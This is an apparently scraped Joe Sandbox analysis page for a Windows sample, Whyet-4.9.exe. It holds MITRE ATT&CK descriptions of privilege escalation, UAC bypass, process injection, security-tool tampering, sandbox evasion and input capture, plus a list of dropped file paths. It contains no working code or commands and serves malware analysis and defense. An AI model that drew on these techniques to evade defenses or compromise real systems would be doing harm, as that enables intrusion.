Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Whyet-4.9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\product1\letsvpn-latest.exe

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Program\ziliao.jpg

C:\ProgramData\Program\iusb3mon.exe

C:\ProgramData\mntemp

C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

Windows Analysis Report
Whyet-4.9.exe

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre